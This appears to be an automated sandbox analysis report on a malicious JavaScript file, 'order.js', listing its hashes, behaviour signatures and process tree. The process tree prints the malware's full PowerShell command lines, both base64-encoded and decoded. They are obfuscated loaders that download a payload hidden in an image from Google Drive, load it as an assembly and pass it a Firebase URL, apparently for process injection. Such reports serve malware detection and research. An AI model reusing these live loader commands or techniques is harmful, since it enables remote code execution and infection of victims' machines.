Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
31-10-2024 03:03
Static task
static1
Behavioral task
behavioral1
Sample
order.js
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
order.js
Resource
win10v2004-20241007-en
General
-
Target
order.js
-
Size
213.4MB
-
MD5
6376d68402f9701827b296b0e32687ac
-
SHA1
e68a2738ae999a0bbac2cff1148b43ef2a6ff372
-
SHA256
8e04f169d134b85055a7dfabd827c30bd12de4e9cda62556066d33a31ef7c258
-
SHA512
4cdeeccbba4d4df7bfd434b9fa2fa0af4bfd0109ea3030f56fa3ca59e5f81d841b6d6bfcfe225cea65cc3c3b3e88793a759e667014943a0f19dbeb1f18c863c4
-
SSDEEP
3072:40PrWZtMkfiM6A2fTFwoqEdKi38VDf00PrWZtMkfiM6A:4HtMRAgJPK/f0HtMRA
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 3004 powershell.exe 5 3004 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2880 powershell.exe 3004 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 drive.google.com 3 drive.google.com -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2880 powershell.exe 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2732 wrote to memory of 2880 2732 wscript.exe 30 PID 2732 wrote to memory of 2880 2732 wscript.exe 30 PID 2732 wrote to memory of 2880 2732 wscript.exe 30 PID 2880 wrote to memory of 3004 2880 powershell.exe 32 PID 2880 wrote to memory of 3004 2880 powershell.exe 32 PID 2880 wrote to memory of 3004 2880 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\order.js1⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcASQBMADAAaQBtAGEAZwBlAFUAcgBsACAAPQAgAEcAdABNAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAJwArACcAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAEEASQBWAGcASgBKAEoAdgAxAEYANgB2AFMANABzAFUATwB5AGIAbgBIAC0AcwBEAHYAVQBoAEIAWQB3AHUAcgAgAEcAdABNADsASQBMADAAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAJwArACcAYgBDAGwAaQBlAG4AdAA7AEkATAAwAGkAbQBhAGcAZQBCAHkAdAAnACsAJwBlAHMAIAA9ACAASQBMADAAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAEkATAAwAGkAbQBhAGcAZQBVACcAKwAnAHIAbAApADsASQBMADAAaQBtAGEAZwBlAFQAZQB4AHQAJwArACcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgASQBMADAAaQBtAGEAZwAnACsAJwBlAEIAeQB0AGUAcwApADsASQBMADAAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAARwB0AE0APAA8AEIAQQBTAEUANgA0AF8AUwAnACsAJwBUAEEAUgBUAD4APgBHAHQATQA7AEkATAAwAGUAbgBkAEYAbABhAGcAIAA9ACAAJwArACcARwB0AE0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AEcAdABNADsASQBMADAAcwB0AGEAcgB0AEkAbgBkAGUAeAAnACsAJwAgAD0AIABJAEwAMABpAG0AYQAnACsAJwBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABJAEwAMABzAHQAYQByAHQARgBsAGEAZwApADsASQBMADAAZQBuAGQASQBuAGQAZQB4ACAAPQAgAEkATAAwAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAEkATAAwAGUAbgAnACsAJwBkAEYAbABhAGcAKQA7AEkATAAwAHMAdABhAHIAdABJAG4AZABlAHgAJwArACcAIAAtAGcAJwArACcAZQAgADAAIAAtAGEAbgBkACAASQBMADAAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIABJAEwAMABzAHQAYQByAHQASQBuAGQAZQB4ADsASQBMADAAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAEkATAAwAHMAdABhAHIAdABGAGwAYQBnAC4ATAAnACsAJwBlAG4AZwB0AGgAOwBJAEwAMABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABJAEwAMABlACcAKwAnAG4AZABJAG4AZABlAHgAIAAtACAASQBMADAAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AEkATAAwAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJwArACcASQBMADAAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoAEkATAAwAHMAdABhAHIAJwArACcAdABJAG4AZABlAHgALAAgAEkATAAwAGIAJwArACcAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBJAEwAMABiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABJAEwAMABiAGEAcwBlACcAKwAnADYANABDAG8AbQBtAGEAbgBkACcAKwAnAC4AVABvAEMAaABhAHIAJwArACcAQQByAHIAYQB5ACgAKQAgAE4ATQBWACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAEkAJwArACcATAAwACcAKwAnAF8AIAB9ACkAWwAtADEALgAuAC0AKABJAEwAMABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsASQBMADAAJwArACcAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAEkAJwArACcATAAwAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAApADsASQBMADAAbABvAGEAJwArACcAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABJAEwAMABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsASQBMADAAdgBhAGkATQBlAHQAaABvAGQAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNACcAKwAnAGUAdABoAG8AZAAoAEcAdABNAFYAQQBJAEcAdABNACkAOwAnACsAJwBJAEwAMAB2AGEAaQBNAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgASQBMADAAbgB1AGwAJwArACcAbAAsACAAQAAoAEcAdABNADYAMQBlADEAZAAwADIAMABlADYAYgA1AC0AJwArACcANwBiAGUAOAAtAGEAYgAxADQALQA4AGYANwBjAC0AYQBmAGYAZAA3ADMAMQA4AD0AbgBlAGsAbwB0ACYAYQBpAGQAZQBtACcAKwAnAD0AdABsACcAKwAnAGEAPwB0AHgAdAAuADQAMgAwADIAMAAxADAAMwBtAHIAbwB3AHgAcgBlAGkAdgBhAHgALwBvAC8AbQBvAGMALgB0AG8AcABzAHAAcABhAC4ANAAyADAAMgBzAHQAcAB5AHIAYwAvAGIALwAwAHYALwBtAG8AYwAuAHMAaQBwAGEAZQBsAGcAbwBvAGcALgBlAGcAYQByAG8AdABzAGUAcwBhAGIAZQByAGkAZgAvAC8AOgBzAHAAdAB0AGgARwB0AE0ALAAgAEcAdABNAGQAZQBzAGEAdABpAHYAYQBkAG8ARwB0AE0ALAAgAEcAdABNAGQAJwArACcAZQBzAGEAdABpAHYAYQBkAG8ARwB0AE0ALAAgAEcAdABNAGQAZQBzAGEAdABpAHYAYQBkAG8ARwB0AE0ALAAgACcAKwAnAEcAdABNAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBHAHQATQAsACAARwB0AE0AZABlAHMAYQB0AGkAdgBhAGQAbwBHAHQATQAsACAARwB0AE0AZABlAHMAYQB0AGkAdgAnACsAJwBhAGQAbwBHAHQATQAsAEcAdABNAGQAZQBzAGEAdABpAHYAYQBkACcAKwAnAG8ARwB0AE0ALABHAHQATQBkAGUAcwBhAHQAaQB2AGEAZAAnACsAJwBvAEcAdABNACwARwB0AE0AZABlAHMAYQB0AGkAdgBhAGQAJwArACcAbwBHAHQATQAnACsAJwAsAEcAdABNAGQAZQBzAGEAdABpAHYAYQBkACcAKwAnAG8ARwB0AE0ALABHAHQATQBkAGUAcwBhAHQAaQB2AGEAZABvAEcAdABNACwARwB0AE0AMQBHAHQATQAsAEcAdABNAGQAZQBzAGEAdABpAHYAJwArACcAYQBkAG8ARwB0AE0AKQApADsAJwApAC0AUgBFAHAAbABBAGMARQAgACgAWwBjAGgAYQByAF0ANwAxACsAWwBjAGgAYQByAF0AMQAxADYAKwBbAGMAaABhAHIAXQA3ADcAKQAsAFsAYwBoAGEAcgBdADMAOQAgACAALQBjAFIAZQBwAEwAQQBDAGUAIAAgACgAWwBjAGgAYQByAF0ANwAzACsAWwBjAGgAYQByAF0ANwA2ACsAWwBjAGgAYQByAF0ANAA4ACkALABbAGMAaABhAHIAXQAzADYALQBSAEUAcABsAEEAYwBFACAAIAAoAFsAYwBoAGEAcgBdADcAOAArAFsAYwBoAGEAcgBdADcANwArAFsAYwBoAGEAcgBdADgANgApACwAWwBjAGgAYQByAF0AMQAyADQAKQB8ACYAIAAoACAAJABwAHMAaABvAG0AZQBbADIAMQBdACsAJABQAFMASABvAE0AZQBbADMAMABdACsAJwB4ACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('IL0imageUrl = GtMhttps://drive.google.com/uc?export'+'=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur GtM;IL0webClient = New-Object System.Net.We'+'bClient;IL0imageByt'+'es = IL0webClient.DownloadData(IL0imageU'+'rl);IL0imageText'+' = [System.Text.Encoding]::UTF8.GetString(IL0imag'+'eBytes);IL0startFlag = GtM<<BASE64_S'+'TART>>GtM;IL0endFlag = '+'GtM<<BASE64_END>>GtM;IL0startIndex'+' = IL0ima'+'geText.IndexOf(IL0startFlag);IL0endIndex = IL0imageText.IndexOf(IL0en'+'dFlag);IL0startIndex'+' -g'+'e 0 -and IL0endIndex -gt IL0startIndex;IL0startIndex += IL0startFlag.L'+'ength;IL0base64Length = IL0e'+'ndIndex - IL0startIndex;IL0base64Command = '+'IL0imageText.Substring(IL0star'+'tIndex, IL0b'+'ase64Length);IL0base64Reversed = -join (IL0base'+'64Command'+'.ToChar'+'Array() NMV ForEach-Object { I'+'L0'+'_ })[-1..-(IL0base64Command.Length)];IL0'+'commandBytes = [System.Convert]::FromBase64String(I'+'L0base64Reversed);IL0loa'+'dedAssembly = [System.Reflection.Assembly]::Load(IL0commandBytes);IL0vaiMethod = [dnlib.IO.Home].GetM'+'ethod(GtMVAIGtM);'+'IL0vaiMethod.Invoke(IL0nul'+'l, @(GtM61e1d020e6b5-'+'7be8-ab14-8f7c-affd7318=nekot&aidem'+'=tl'+'a?txt.42020103mrowxreivax/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptthGtM, GtMdesativadoGtM, GtMd'+'esativadoGtM, GtMdesativadoGtM, '+'GtMAddInProcess32GtM, GtMdesativadoGtM, GtMdesativ'+'adoGtM,GtMdesativad'+'oGtM,GtMdesativad'+'oGtM,GtMdesativad'+'oGtM'+',GtMdesativad'+'oGtM,GtMdesativadoGtM,GtM1GtM,GtMdesativ'+'adoGtM));')-REplAcE ([char]71+[char]116+[char]77),[char]39 -cRepLACe ([char]73+[char]76+[char]48),[char]36-REplAcE ([char]78+[char]77+[char]86),[char]124)|& ( $pshome[21]+$PSHoMe[30]+'x')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD545f2acdf6cfb743aa39518ed57089a2d
SHA1560c92e95c293def57fddbeaf7c055ff8b7f84d2
SHA2560521f8b86fed5ce29eef5d2a7c48d2fe839088d45f436bf699027f82c980dd8d
SHA5128f96ed13ac63151d28eb71da6714aedb530e778f90d1a31d3730a736b4881290364c199d5106bbbbf50c1a3b211cffb1feff8137f79df32b35ee60aac1a77147